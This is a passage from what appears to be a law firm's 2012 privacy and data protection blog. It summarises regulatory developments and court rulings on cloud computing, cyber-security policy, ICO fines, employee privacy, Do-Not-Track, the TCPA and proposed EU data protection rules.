    • The cloud provider should only be permitted to process personal data for specified purposes and not without the agreement of the cloud customer.
  • Data Transfer
    • Cloud servers may be located outside the UK which can make it difficult to establish where data is being processed. The cloud customer should therefore request from the cloud provider a list of countries where data will be processed and the safeguards in place in each location. Furthermore, the cloud provider should explain when data will be transferred to the locations.

The ICO recognizes the benefit of cloud computing and this new guidance contains pragmatic suggestions to assist organizations in conducting due diligence on a cloud supplier, and in ensuring data protection compliance.

EU Announces Plans for a Cyber-Security Bill

This post was written by Cynthia O'Donoghue.

At an Information Security Conference on 4 November 2012, the EU Commissioner for a Digital Agenda, Neelie Kroes, revealed plans to introduce legislation involving the implementation of a high level of network and information security across the EU, effectively extending the obligations to adopt risk management measures to private sector industries such as banking, energy, health and transport.

With cyber-security threats and vulnerabilities increasing as businesses in virtually all sectors interact with, and depend on, digital networks and infrastructure to provide their services, the Commissioner stated that cyber-security should be “on top of the agenda”. Commissioner Kroes stated that “web-based attacks went up 36% in the year 2011”, and a recent Eurostat survey revealed that only 26 percent of enterprises in the EU at the beginning of 2012 had a formally defined security policy with a plan for regular review.

Although networks and infrastructure are mainly privately owned and run, the Commissioner declared that there is a shared responsibility between the public and private sectors to address cyber-security, with the public sector needed to provide incentives and set the example for the private sector to follow.

International cooperation on cyber-security is one of the Commissioner’s key priorities, and she pointed to the approach to cyber-security adopted by the United States as the method to follow, declaring that “in the U.S. it has long obtained political attention.” The European strategy for cyber-security which Kroes plans to put forward aims to encourage demand for greater security and promote the competitiveness of the EU ICT industry, elevating cyber-security on the political agenda whilst continuing to promote the “EU core values and fundamental rights, including freedom of expression and access to information, as well as data protection and privacy.”

New UK Cyber-security Initiative to Assist Organisations facing Cyber Threats

This post was written by Cynthia O'Donoghue.

CESG, the Information Assurance arm of UK Government Communications Headquarters (GCHQ), in collaboration with the Centre for the Protection of National Infrastructure (CPNI), has launched a new initiative called ‘Cyber Incident Response’. The scheme will offer organisations facing cyber threats the opportunity to contact companies certified to respond effectively to the consequences of cyber-attacks. The companies’ response role will be to analyse and then contain the incident, followed by a cleaning-up operation.

Currently, the pilot scheme comprises four companies including BAE Systems Detica, Cassidian, Context IS and Mandiant Corp. Each company was selected by CESG based on its expertise and experience in providing cyber response services. These companies will work in partnership with GCHQ, CPNI and the other companies to set the future standards for cyber response services. Currently the scheme is aimed at the public sector, but there is potential for it to be utilised in the private sector as the programme matures. There are also plans to develop and publish eligibility criteria so that other companies can become accredited when the programme is expanded into full service, which is expected by spring 2013.

Cyber Incident Response is intended to build on the “10 steps to cyber security”, which we blogged about in September and which provided guidance to organisations trying to prevent cyber vulnerabilities.

The introduction of the scheme comes at an opportune time for the UK as it faces on-going and persistent threats of increasingly sophisticated cyber-attacks. Detica earlier this year warned that there has been a tenfold increase in cyber-attacks since 2011, with the attacks coming from more cyber attackers and an increasing number of countries.

Chloe Smith, Minister for Cyber Security, declared that "the growing cyber threat makes it inevitable that some attacks will get through either where basic security is not implemented, or when an organisation is targeted by a highly capable attacker." She encouraged a joint response from organisations and industry to counter this and improve the cyber security of the UK.

UK Information Commissioner fines Prudential Assurance for breaching the Data Protection Act

This post was written by Cynthia O'Donoghue.

The UK Information Commissioner’s Office (ICO) served a monetary penalty of £50,000 on Prudential, after Pru merged accounts of two people with the same name and same date of birth five years ago. The “mix-up” in administration of two accounts culminated in tens of thousands of pounds ending up in the wrong account. Despite repeated attempts to sort out the matter over a three-year period, the Pru continued to confuse the accounts and accountholders.

This is the first time the ICO has issued a monetary penalty for a breach of the Data Protection Act other than for loss of personal data. The ICO determined that the inaccuracies and the failure to keep customer records up to date were a serious contravention of the Data Protection Act.

The ICO received more public complaints about data handling by the money lenders than any other sector. Around 15% of the nearly 13,000 data protection complaints related to concerns about the financial services sector, with inaccurate data the third most complained about issue across all sectors.

Stephen Eckersley, ICO head of Enforcement, stressed that “staff should also receive adequate training on how to manage and maintain [customer records], with any concerns fully investigated in order to ensure problems are addressed at an early stage.”

Prudential has co-operated with the ICO and has now updated its processes and implemented staff training to ensure greater accuracy of customer records.

Information Commissioner's Office set to issue first fines under the Privacy and Electronic Communications Regulations

This post was written by Cynthia O'Donoghue.

Since March of this year, the Information Commissioner’s Office (ICO) has been asking members of the public to report any calls or texts they have received from unknown senders by using an online survey. The survey information has allowed the ICO to focus its investigations on organisations responsible for making unsolicited communications. The ICO received nearly 30,000 responses and has been working to link these numbers to companies with a view to enforcement action.

The ICO announced its intention to issue two monetary penalties in excess of £250,000 to illegal marketers, the first under the Privacy and Electronic Communications Regulations ('PECR'), which regulate electronic marketing. Each of the marketers has distributed millions of spam texts to individuals without obtaining their permission. The two marketers have 28 days to respond to a letter sent by the ICO with proof that they were complying with the law; otherwise, final penalty notices will be issued.

The ICO has indicated that they will continue to monitor compliance with the Regulations. Simon Entwisle, Director of Operations at the ICO, stated that they “are already working to identify other individuals and companies involved in these unlawful practices.” He went on to say that this is “an important step that shows those who blatantly break the law will be in line for a sizeable six-figure penalty from the ICO.”

California's Shine the Light Law: Litigation Update

This post was written by Steven Boranian and Joshua Marker.

Earlier this year we wrote to you about an increase in litigation claiming violations of California’s Shine the Light law. Since that time, multiple courts have had the opportunity to interpret the law. This has brought some much-needed clarity to the exact contours of the law, and provided direction on what is required for companies to remain in compliance.

As you will recall, the Shine the Light law, California Civil Code 1798.83, is intended to provide transparency to meet consumers’ demand to know how the businesses they patronize use, share, and disclose personal information. Multiple class actions were filed alleging that certain businesses did not provide consumers with the information necessary to obtain an accounting of how their personal information was used and disclosed.

In order to maintain a lawsuit, however, these initial court decisions have made it clear that a plaintiff must allege more than failure to provide contact information to obtain an accounting of the use and disclosure of personal information. A plaintiff must also properly allege an injury in order to have standing. So far, plaintiffs have taken two different approaches to alleging an injury, one of which suggests that this is not the end of Shine the Light litigation.

First, plaintiffs have advanced numerous theories of economic injury, with no success to date. In Boorstein v. Men’s Journal LLC, 2012 WL 2152815, the court rejected the theory that failure to provide a method for obtaining an accounting diminished the value of plaintiff’s personal information. In Miller v. Hearst Communications, Inc., 12-CV-0733 (C.D. Cal.), the court rejected this same “diminished-value-of-information” theory, and then, on an amended complaint, rejected the theory that compliance with the Shine the Light law was part of the benefit of the bargain and that failure to comply deprived plaintiff of the full value of its subscription.

Second, these plaintiffs have argued that they have standing because of “informational injury.” That is, the plaintiffs were injured because they failed to obtain information that must be publicly disclosed pursuant to a statute. While neither case above found an informational injury on those facts, both noted that informational injury may be viable in certain narrow circumstances. In order to have standing, a plaintiff must either show that it in fact requested this information and did not receive it, or provide evidence that it would have requested the information if the company had disclosed a method for doing so. In a third case, Baxter v. Rodale, Inc., 12-CV-00585 (C.D. Cal.), the court in fact found that plaintiff did have standing under the informational injury theory because plaintiff had visited the company’s website on numerous occasions and the required disclosures were not there. That case, however, was nonetheless dismissed, as the court found that the company did provide contact information for consumers to opt out of information-sharing and thus was in compliance with the law.

In summary, while plaintiffs have not yet found success in Shine the Light litigation, the courts have found that in limited situations, informational injury may provide a basis for a plaintiff to have standing to maintain a lawsuit. Given that the courts have left the door slightly open in part, we likely have not heard the last of Shine the Light litigation. Further, it should be noted that the same plaintiffs’ lawyers have begun filing similar class actions under other states’ laws. It is critical that you stay up-to-date and ensure compliance with the law.

Protection of employee privacy rights in France: measures controlling employees in the workplace must be treated with caution - employers should avoid placing restrictions upon themselves

This post was written by Daniel Kadar.

France’s highest court (“Cour de cassation”) ruled 26 June 2012 in Monsieur X v. YBC Helpevia that a company’s internal rules may limit an employer’s access to employee emails.

French case-law has traditionally held that employees have a right to privacy at their workplace and that an employer cannot search an employee’s personal files stored on a work computer without breaching the employee’s right to privacy (Nikon France v. Onof).

As a result, case-law allows a French employer to search an employee’s professional messages, but prohibits any access to his/her personal files and messages that are specifically identified and marked “personal”.

The current decision has, however, narrowed the employer’s ability to search an employee’s professional files if the internal rules of the company place restrictions on the search.

In the current case, an employee was suspected of hacking into the email account of his employer in order to access data about potential future salary increase proposals. To confirm the suspicion, the employee’s emails were opened by the company on his professional computer whilst he was absent. However, the company’s internal rules stated that the employer would refrain generally from accessing the employee’s computer in such circumstances. The “Cour de cassation” confirmed the Rouen Court of Appeal decision and ordered the company to compensate the employee for unjust dismissal.

This decision established that if there is a general prohibition of the employer reading employees’ emails in their absence in the internal rules of a company, no distinction between personal and professional communications will be made – none of the communications may be read.

As a consequence, by failing to make the distinction between personal and professional messages in its internal rules, the company restricted its ability to access the employee’s professional emails by stating that such access could only be in the physical presence of the employee.

French companies looking to monitor their employees’ communications should therefore make sure that they do not unintentionally restrict themselves more than the law requires. This is also a reminder for employers that they need to draft their internal policies very carefully.

Employee protection remains a very sensitive issue in France. On another topic, the French CNIL published on 23 October 2012 its decision to withdraw the previous authorisation it had granted to employers to monitor employee access to the workplace, as well as employees’ work schedules, by biometric means.

The CNIL therefore decided to suspend for five years the application of its 2006 AU-007 “Unique Authorisation”, on the grounds that French labour organisations prefer non-biometric management tools in order to strengthen workers’ rights and to preserve the relationship of trust between employer and employees.

European Commission shows concern over the slow development of the Do-Not-Track standard

This post was written by Cynthia O'Donoghue.

Neelie Kroes, Vice President of the European Commission, has signalled her concern over the progress of the adoption of the Do-Not-Track (DNT) standard, which is being developed by the World Wide Web Consortium (W3C) as a universal mechanism for communicating consent, or lack of consent, to the tracking of individuals’ web data. The mechanism is already present in certain browsers, including those from Microsoft and Mozilla; however, the lack of a commonly agreed-upon standard is causing dispute, with increasingly broad exceptions being suggested to the W3C, which Jon Leibowitz, the Federal Trade Commission's Chairman, labelled 'a loophole you could drive a virtual truck through'.

Delay and frustration of the process have mostly been attributed to advertisers and marketers, many of whom are insisting that marketing is one of the most important freedoms of a civilised society, and that the DNT will harm their business operations. Indeed the Direct Marketing Association (DMA) has asked the W3C that marketing be added to the list of those activities exempt from the standard, which has drawn much condemnation from the Commissioner.

This ‘watering down’ of the standard is the main problem according to Kroes, who would prefer that DNT build on the principle of informed consent, giving consumers control over their information and letting them choose not to be tracked. Kroes addresses the current issues over default settings, stating that DNT should be specific in informing consumers about which default settings are in their software and devices. Anonymisation and retention limits should be incorporated as mitigations, but cannot be seen as a ‘get-out clause’.

Kroes criticised the current DNT standard, declaring that it will not, on its own, guarantee satisfaction of the cookie requirements under the ePrivacy Directive, but did emphasise the value of DNT in harmonising online business and transparency to consumers.

Kroes warned that time is running out to create a simple, uniform and self-regulatory standard to address tracking. She views harmonised DNT standards as having universal appeal. "When I say this is in everyone's interest, I mean everyone. Including American companies. Because if you want to track Europeans, you have to play by our rules."

Singapore Passes Personal Data Protection Bill

This post was written by Cynthia O'Donoghue.

Singapore has passed the Personal Data Protection Bill after its second reading in Parliament on 15 October. The Bill applies to all organisations across the private sector.

In his speeches to Parliament, Yaacob Ibrahim, the Minister for Information, Communications and the Arts (MICA), said that in an era of exponential data growth, there was a need for a move away from the original sectoral approach to a general data protection framework, to ensure a baseline standard of protection for personal data across the country that will operate concurrently with other legislative and regulatory frameworks.

To allow businesses time to adjust their data management policies and procedures, Singapore will adopt a phased approach to implementing the personal data protection law. The transition-period schedule stipulates that the Do-Not-Call (DNC) registry provisions will come into force in 12 months, and the data protection rules will come into force in 18 months.

Of particular note, and different from the European definition of ‘personal data’, the scope of the new law covers not just living individuals, but also deceased persons for a period of 20 years following their deaths. The rules on international transfers are less prescriptive than those of Europe: transfers will be allowed once an organisation has ensured that appropriate measures are in place to protect the data.

A Personal Data Protection Commission (PDPC) will be set up to function as the country's main authority to administer and enforce the data protection rules. If an organisation is non-compliant, the PDPC may impose a maximum financial penalty of S$1 million (USD $819,000). A National Do-Not-Call (DNC) Registry will be created by early 2014.

The minister extolled the virtues of the Personal Data Protection Bill, stating that it will strengthen Singapore’s overall competitiveness, and will enhance its status as a global data hub by providing a conducive environment for global data management industries, such as cloud computing and business analytics, to operate in Singapore.

Spotlight on Insurance Recovery: Network and Security Representations and Warranties in Cyberliability Insurance Applications

This post was written by Amy S. Mushahwar and J. Andrew Moss.

If your team is in the process of negotiating and purchasing security and data privacy event liability insurance (“cyberliability” coverage), think carefully before signing any technical due diligence representations or warranties that are typically requested in connection with the insurance application. Oftentimes, this detailed privacy compliance document is presented to an IT or security group with very little input from the company’s legal team. This is an area where the lawyers need to be acting in concert with IT and/or security, not only because the information communicated to the insurer’s underwriter likely will not be privileged (and thus could be disclosed in litigation), but also because errors or misstatements in the application, even if innocent, may give rise to an insurance coverage dispute in the event of a claim. Reviewing the completed insurance application with the assistance of counsel before submission to the underwriter may help to avoid problems down the road. For example, one of our clients discovered in the process of applying for cyberliability coverage that it was representing that it had full, up-to-date system-patching in place across the enterprise. In most organizations, however, full system-patching is not feasible or even advisable, given customized software suites, new-version software bugs, or other software/hardware-specific compatibility issues. By having its legal and technical teams work in concert, our client was able to correct this representation prior to disclosure, which in the event of a breach or claim could otherwise have unnecessarily compromised the company’s ability to recover under its insurance policy, and to provide the underwriter with its system-patch management policy showing the flexibility to conduct patch analysis.

Opinion of the European Data Protection Supervisor on the European Commission proposal for a Regulation of the European Parliament and of the Council on trust and confidence in electronic transactions in the internal market

This post was written by Cynthia O'Donoghue.

The European Data Protection Supervisor (EDPS) has published its opinion on the European Commission’s draft Regulation on electronic identification and trust services for electronic transactions in the internal market. The proposed Regulation is expected to enhance trust in pan-European electronic transactions and to ensure cross-border mutual recognition of electronic identification, by enhancing the current rules on e-signatures and by providing a legal framework for electronic seals, time stamping, electronic document acceptability, electronic delivery and website authentication.

Electronic Identification schemes and trust services raise significant data-protection issues stemming from the processing of personal data, and the EDPS supports the proposed Regulation as a method of harmonising data-protection principles, and contributing toward mutual recognition and acceptance of electronic trust services and identification schemes. The EDPS, however, has suggested several recommendations to increase harmonisation and interoperability, such as a common set of security requirements, and clarification of individuals’ rights of access and to be informed.

The proposed Regulation leaves wide discretionary powers with the member states to create electronic identification schemes, and the EDPS recommends adopting a common set of conditions to be applied for the use of national identification schemes across borders.

In relation to the requirements for a mutual recognition scheme for electronic identification schemes, the EDPS recommends that the Proposed Regulation specify: (i) which data or categories of data will be processed for cross-border identification of individuals, and set data minimisation goals; (ii) a common minimum safeguard level proportionate to the risks involved and at least compliant with the requirements set forth for providers of qualified trust services; and (iii) a set framework for the interoperability of national identification schemes.

In relation to the requirements for the provision and mutual recognition of electronic trust services, the EDPS recommends that the Proposed Regulation specify: (i) if personal data will be processed and, if so, the data or categories of data to be processed so as to assess data protection implications; (ii) appropriate safeguards to avoid any overlap between the competencies of the supervisory bodies; (iii) that notification requirements for data breaches be consistent with those in the e-Privacy Directive; and (iv) the setting of specific time limits for data retention.

Post-Election Cybersecurity

This post was written by Timothy J. Nagle and Paul Bond.

A draft executive order on Improving Critical Infrastructure Cybersecurity Practices may now gain speed with the re-election of President Obama. The Cybersecurity Act of 2012 was introduced by Senators Lieberman and Collins (Homeland Security and Government Affairs Committee), Rockefeller (Commerce) and Feinstein (Intelligence) but failed to gain enough support in the private sector and with other members to become law. The essential elements of the legislation were to foster the exchange of threat or event information between the government and the private sector, provide limited protection from liability to encourage such voluntary exchange by the private sector, and encourage collaboration on the creation of voluntary cybersecurity standards. With the election results, a resurrection of cybersecurity legislation is probable. While all members recognize the existence and significance of the cyber threat, they will continue to differ on the approach with Republicans expressing concern that the recent legislation introduced more regulatory burdens. In anticipation of a protracted legislative process, and to address the immediate cybersecurity concern, release of an executive order in the near term is likely. A paper draft that was recently circulated among the Deputies Committee contains elements that are consistent with the proposed legislation and draft executive order with some new twists.

Please click here to read the issued Client Alert.

European Parliament Publishes Study Suggesting Improvements to the European Commission's Proposed Data-Protection Package

This post was written by Cynthia O'Donoghue.

The European Parliament has published a study aimed at providing advice on priority measures to ensure that the Proposed Data Protection Regulation, presented by the European Commission (EC) earlier this year, is more comprehensive in relation to data protection and more protective of consumers’ privacy rights.

The European Parliament supports various new rights, namely the right to be forgotten, the right of portability, and the right against profiling, and commends the EC’s proposal to create a level playing field across the EU through inclusion of a ‘one-stop-shop’ principle. This principle involves a single data-protection authority based on an organisation’s main location, the applicability of data protection laws extraterritorially for businesses active in, but based outside, the EU, and the general principle of accountability.

The European Parliament believes, however, that globalisation and the advent of new technologies still need to be fully addressed. The proliferation of geo-location services, smart metering, face recognition technologies, social networking services, online gaming, and RFID technologies has meant that companies and governments are often processing personal data without data subjects being aware of the impact of these activities.

While the European Parliament supports the refined definition of consent, the study recommends that a variety of online identifiers, such as IP addresses or cookies, should be specifically qualified, and situations illustrated where they should be treated as personal data. The study also recommended that the proposed Regulation should encourage anonymisation, especially for the processing of sensitive data. Further, the European Parliament would like to see the scope of what constitutes a data controller limited to organisations that determine the “purposes” of data processing, rather than the “conditions”, as well.

The European Parliament sees international data transfers as a key area requiring improvement, especially in the context of cloud computing. The study calls for a greater emphasis on risk assessment prior to transferring data, with more emphasis on accountability, and suggests the development of an accreditation system or a dedicated Cloud Safe Harbour Programme, as well as self-regulatory industry standards.

European Committee on Civil Liberties, Justice and Home Affairs releases a second Working Document on the General Data Protection Regulation draft

This post was written by Cynthia O'Donoghue.

The European Parliament's Committee on Civil Liberties, Justice and Home Affairs has outlined its concerns over the lack of clarity within the data protection principles contained in the proposed General Data Protection Regulation, and has made various proposals which it believes will strengthen the level of data protection.

The Committee stresses the need to include a definition of ‘anonymity’ to illustrate to data controllers when they are outside the scope of the Regulation, and that the definition of ‘consent’ needs to be clearer and include clarification that technical standards that express an individual’s wishes, such as a ‘Do Not Track’ standard, are a valid form of providing explicit consent.

To improve transparency, the Committee also suggests that information about how data is processed be provided to individuals in an easily comprehensible form, such as by ‘layered privacy policies’ and standardised logos or icons. The Committee also supports the extraterritorial application of the proposed Regulation, but believes that the criteria for determining ‘adequacy’ may need to be strengthened.

Whilst endorsing the right to be forgotten, the right to object, and the mandatory introduction of Data Protection Officers (DPO) within the EU, the Committee nonetheless suggests that more specific guidance in relation to DPO independence, powers and duties is necessary, and that further strengthening accountability can be achieved through aligning data breach notification with standards contained in the e-Privacy Directive.

The Committee encourages a clearer division of duties and responsibilities between data controllers and data processors to avoid legal uncertainty for companies, authorities and consumers, as well as stronger incentives for companies to implement privacy-by-design principles.

Art. 29 Working Party seeks refined definition of 'personal data' in the proposed General Data Protection Regulation

This post was written by Cynthia O'Donoghue.

In its second opinion on the proposed Data Protection Regulation, the Article 29 Working Party suggests that a natural person can be considered identifiable when, within a group of persons, he or she can be distinguished from other members of the group and consequently be treated differently. They have therefore recommended that information that can lead to individuals being singled out and treated differently should be considered “personal data.” The Working Party proposes broadening the definition of “data subject” in the proposed Regulation to include not only identified or identifiable natural persons, but also those who could be singled out and treated differently.

The Working Party also suggested that organisations should have to treat “cookie identifiers” and “IP addresses” as personal data. This would be accomplished by altering recital 24 which, although not legally binding, provides additional detail on what is to be meant by the definition of personal data.

The Working Party has also defended the "new and positive elements" drafted into the proposed Regulation on rules around consent. Responding to criticism that it might be impractical to always obtain explicit consent, the Working Party supports broad requirements to explicit consent as "necessary to truly enable data subjects to exercise their rights".

The Working Party raised a concern that the European Commission could adopt delegated acts without seeking approval from the Working Party's successor body, the European Data Protection Board (EDPB). This concern is shared by the wider data protection community, as the EDPB will be much closer to issues at a national level and in a position to recommend outcomes.

Effective Dates for Previously Published Amendments to the FCC's TCPA Regulations Have Recently Been Announced

This post was written by Judith L. Harris and Amy S. Mushahwar.

PLEASE NOTE that the amendments to the Federal Communications Commission’s (FCC) regulations implementing the Telephone Consumer Protection Act (TCPA) published by the FCC June 11, 2012, and relating, most significantly, to the necessity of obtaining written consent before placing some autodialed calls or sending some prerecorded messages, have now been approved by the Office of Management and Budget (OMB) and published in the Federal Register. Accordingly, the effective dates of those amendments appear below:

  • Amendment to the abandoned call requirements (47 CFR 64.1200(a)(7)) will be effective November 15, 2012.
  • New rule requiring that an automated opt-out mechanism be included in all prerecorded telemarketing messages (47 CFR 64.1200(b)(3)) will be effective January 14, 2013.
  • The requirements to obtain express written consent before making autodialed or prerecorded telemarketing calls to wireless numbers, and before sending prerecorded telemarketing messages to residential lines (47 CFR 64.1200(a)(2) and (3)), will be effective October 16, 2013.

A copy of the Federal Register Notice is provided here.

Ninth Circuit Uses Potentially Dangerous Language Regarding What Constitutes Prior Express Consent Under the TCPA

This post was written by Judith L. Harris and Amy S. Mushahwar.

Appellant, joined by a number of amici including the American Bankers Association, is seeking rehearing or rehearing en banc in connection with a recent decision by the Ninth Circuit that should be of grave concern to any entity that uses auto-dialers in its contacts with consumers. That decision, in the case of Meyer v. Portfolio Recovery Associates, LLC (PRA), upheld a district court's grant of a preliminary injunction and provisional class certification in a suit alleging violations of the Telephone Consumer Protection Act (TCPA), 47 U.S.C. § 227.[1]

Please click here to read the issued Client Alert.

[1] Meyer v. Portfolio Recovery Associates, LLC, 2012 WL 4840814 (9th Cir. (Cal.)).

The FCC May Be Preparing To Release Guidance on the Definition of an Autodialer and on Other TCPA Related Issues

This post was written by Judith L. Harris and Amy S. Mushahwar.

Over the course of the past couple of weeks, the Federal Communications Commission released a flurry of Public Notices putting out for comment seven pending Requests for Declaratory Rulings, most relating to the use of auto-dialing technologies, and all relating to the application of the Telephone Consumer Protection Act of 1991 (TCPA). Moreover, a number of other, similar requests have been put out for public comment by the FCC in recent months. The majority of these requests seek interpretation or clarification of how the TCPA's definition of an "autodialer" is to be applied in the wide variety of circumstances that have resulted from technological developments in the two decades since the TCPA was enacted.

Please click here to read the issued Client Alert.

 

Research and drafting assistance for this post was provided by Reed Smith Legal Intern Patricia Cave.

 

California AG to Mobile App Developers: The Time to Post Your Privacy Policy is Now

This post was written by Amy S. Mushahwar and Christine E. Nielsen.

In February, California Attorney General Kamala D. Harris warned mobile app developers that their disclosure of data-collection practices to consumers would face scrutiny from her office in the coming months, and that entities not in compliance with California’s requirement to maintain and post a privacy policy would be investigated. We discussed that warning, and noted that mobile app developers would have some time to play “catch up” to draft, approve, and post privacy policies. As of October 30, time’s up.

On Tuesday, Attorney General Harris announced that she sent letters to approximately 100 mobile app developers and companies that her office determined were non-compliant with California privacy law. Those companies have 30 days to come into compliance; that is, to conspicuously post a clear and appropriately formatted mobile privacy policy within their mobile app. Entities that do not comply within 30 days potentially face a civil penalty of $2,500 for each download of the non-compliant app, which could add up quickly if your app receives considerable consumer traffic.

The California Online Privacy Protection Act requires an operator of a commercial website or online service that collects personally identifiable information from California residents to conspicuously post or make available its privacy policy. That privacy policy must identify the categories of personally identifiable information the operator collects, as well as the policy's effective date and the operator's method for notifying consumers of changes to the policy. In addition, if the operator has a process whereby consumers can review and request changes to their collected information, the policy must describe that process.

We have previously discussed the state attorneys general's focus on mobile application privacy for 2012, and more recently interviewed Travis LeBlanc, who noted that the new Privacy Enforcement and Protection Unit would pay close attention to privacy in the mobile environment.

Mobile app developers who were not in this first round of enforcement notices, but who have not yet posted a privacy policy that describes the categories of personally identifiable information their apps collect, should take this opportunity to get something in place immediately. Attorney General Harris calls these letters the "first step" in the Privacy Enforcement and Protection Unit's efforts to enforce the Online Privacy Protection Act, and her office will likely move on to another round of apps. The time for playing catch up is over.
 

How to mitigate Compliance requirements and Code of Conduct obligations with Data Protection regulation: Reed Smith Paris provided some illustrative examples

This post was written by Daniel Kadar.

On 25 October 2012, Reed Smith Paris partner Daniel Kadar and counsel Séverine Martel hosted a new edition of the conference cycle organised by Reed Smith Paris with the European American Chamber of Commerce, dedicated to reconciling compliance obligations, particularly those set forth in Codes of Conduct, with data protection requirements.

After a general presentation of the data protection requirements in France, particularly the duty to notify processing to the French Data Protection Authority, the Commission Nationale de l'Informatique et des Libertés (CNIL), the panel, which included compliance directors of French health care giant SANOFI and General Electric Health, gave examples of how to reconcile compliance obligations, in particular those set forth in the Codes of Conduct that most international organisations have now adopted, with applicable data protection regulation.

The first example concerned the new French health care regulation and its transparency and disclosure requirements as to the existence (and the financial range) of agreements between the health care and cosmetics industries and health care professionals (including medical students). It showed that the disclosure of financial and private information (such as the home addresses of medical students) has to be managed carefully with respect to the data subjects' rights of information and access.

The second set of examples concerned the implementation of whistle-blowing hotlines in France, which must have a restricted scope under French law. The ground for this limited scope is that the French regulator worked solely on the basis of the Sarbanes-Oxley ("SOX") Act obligations, which are limited to accounting and audit matters, and therefore largely excluded the other fields of application that Codes of Conduct generally also cover.

After having highlighted the major characteristics of the requirements under French law, taking into account specific labor law obligations, the panel concentrated on the ways and means of implementing such hotlines in France:

  • Integrating them globally, or on a regional basis
  • Operating them through third-party service providers or through in-house "mediators"
  • Insisting that such hotlines constitute only an alternative to more formal channels for reporting to management, and excluding anonymous reports

The panel concluded that there is no "one size fits all" compliance recipe, and that compliance remains a matter of state-of-the-art reconciliation of contradictory regulations.

 

FTC Announces $50,000 Prize for Technical Solution Enabling Consumers To Block Robocalls

This post was written by Judith L. Harris and Amy S. Mushahwar.

In last week’s all-day Robocall Summit at the Federal Trade Commission (“FTC”), representatives of the FTC and the Federal Communications Commission (“FCC”), and the Indiana Attorney General, repeatedly referenced their frustration in the face of a constantly multiplying number of consumer complaints regarding unwanted robocalls and their inability, as regulators, to stay ahead of the “bad guys” in an increasingly digital world. The FCC’s Chief Technology Officer lamented that “automation has been all on the side of the bad guys. …Law enforcement operates in the analog world.”

Please click here to read the issued Client Alert.

 

Supreme Court of Canada Recognizes Employee Privacy Rights in Workplace Computers

This post was written by Mark S. Melodia and Frederick Lah.

Last year, we blogged about an Ontario Court of Appeal case holding that a teacher had a reasonable expectation of privacy in his work computer.

In that case, a high school teacher, Richard Cole, was charged with possession of child pornography and the unauthorized use of a computer. Cole had been issued a laptop by the school, which he was permitted to use for personal purposes. In addition to keeping some personal files on the laptop, Cole downloaded nude photos of a high school student. When a technician found the photos while performing his duties, he copied them onto a disc and showed them to the school principal. The principal seized the laptop and handed both the laptop and the disc over to the police. The police then took a mirror image of the laptop's hard drive without a warrant. The Court of Appeal for Ontario held that Cole had a reasonable expectation of privacy in the laptop, and that the mirror image of the hard drive was wrongfully obtained. The court held that the disc containing the photos was legally obtained because the technician had a right to access Cole's laptop.

This past Monday, the Supreme Court of Canada reinforced the appellate court’s position that Cole had a privacy right over the personal use of his workplace laptop, and that he should not have been subjected to a warrantless search. The issue as to whether the disc was wrongfully obtained was not in dispute. The court reasoned:

“The accused’s personal use of his work-issued laptop generated information that is meaningful, intimate, and organically connected to his biographical core. Pulling in the other direction are the ownership of the laptop by the school board, the workplace policies and practices, and the technology in place at the school. These considerations diminished the accused’s privacy interest in his laptop [ ] but they did not eliminate it entirely. On balance, the totality of the circumstances support the objective reasonableness of the accused’s subjective expectation of privacy. While the principal had [ ] a reasonable power to seize and search a school-board issued laptop, the lawful authority of the accused’s employer to seize and search the laptop did not furnish the police with the same power.”

It is important to note, though, that while the court held that a privacy right existed in Cole’s work-issued laptop, the court still found the copy of the hard drive to be admissible under its application of Canadian evidence law: “The exclusion of the material would have a marked negative impact on the truth-seeking function of the criminal trial process. The admission of the evidence would not bring the administration of justice into disrepute and therefore the evidence should not be excluded.”

As we noted in our last post, and as is clear from the court's language, determinations as to whether a reasonable expectation of privacy exists will continue to be fact-specific. The court's holding here clearly does not give employees an unqualified expectation of privacy in their work computers. Who actually owns the computer, and the workplace's policies and practices, will be taken into consideration. Whether or not such an expectation exists will continue to depend on the totality of the circumstances.

Privacy International publishes its analysis of the European Commission's proposal for a General Data Protection Regulation

This post was written by Cynthia O'Donoghue.

On 25 January 2012 the EC proposed a uniform legal framework for providing legal certainty on data protection. The most notable proposed change is that from a European Directive to a Regulation (the Proposed Regulation) to ensure directly enforceable implementation across all Member States. The Proposed Regulation sets out general rules on data protection that would modernise and further harmonise the data protection regime created by the Data Protection Directive (95/46/EC).

The European Data Protection Supervisor (EDPS) has stated that, while the Proposed Regulation is a huge step forward for data protection in Europe, it still fails to offer a comprehensive set of data protection rules for the EU.

Privacy International’s analysis concurs with this sentiment.

It suggests that the Proposed Regulation goes some way to ensure that data protection law responds to contemporary and emerging threats to the right to privacy, and commends the introduction of additional controls for individual consumers with regards to access, correction and deletion and the provision of greater power for independent authorities to ensure effective enforcement. It also welcomes the emphasis on responsibility and accountability through privacy by design and the introduction of data breach notification for all industry sectors.

Privacy International, however, also expresses concern over various weaknesses that may undermine individuals' rights. It is advocating for more specific, comprehensive protection, including:

  • A stronger definition of consent, making it 'provable'.
  • A clearer definition of processing on the grounds of 'legitimate interests'.
  • Data breach notification limited to cases of serious risk, to avoid notification fatigue.
  • Provision to individuals of information about profiling and security measures.
  • Deletion of the provision allowing further non-compatible use, on the basis that it undermines the very foundation of data protection.

While most of us welcome the idea of greater harmonisation of data protection law across the EU, Privacy International's views sit uneasily with the other fundamental purpose of data protection law, which is the free flow of data. While individuals' rights should be protected, the EU has the unenviable task of ensuring that this is done in a way that does not thwart business or have a dampening effect on the EU's goals for the future of its digital economy.

Privacy International publishes its analysis of the European Commission's proposal for a Data Protection Directive in the law enforcement sector

This post was written by Cynthia O'Donoghue.

On 25 January 2012 the European Commission proposed a uniform legal framework for providing legal certainty on data protection. This includes a Regulation (the Proposed Regulation) with general rules on data protection that would modernise and further harmonise the data protection regime created by the Data Protection Directive (95/46/EC) and a Directive (the Proposed Directive) with specific data protection rules for the law enforcement sector.

The Proposed Directive has been met with critical reviews, with the European Data Protection Supervisor (EDPS) taking the view that the Proposed Directive does not meet the requirement of a consistent and high level of data protection and the Article 29 Data Protection Working Party (WP29) stating that it was “disappointed by the Commission’s level of ambition and [the WP29] underlines the need for stronger provisions.” This lack of high level data protection is troubling because in the context of law enforcement citizens may be put at particular risk due to the likely processing of sensitive personal data.

In its analysis of the Proposed Directive, Privacy International is principally concerned that (i) the rights of data subjects are significantly weaker than they would be under the Proposed Regulation; (ii) data controllers are subject to fewer and vaguer obligations than they would be under the Proposed Regulation; (iii) there is no mention of preventing transfers of data to non-competent authority recipients; and (iv) supervisory authorities have disproportionately limited powers in comparison to their peers under the Proposed Regulation.

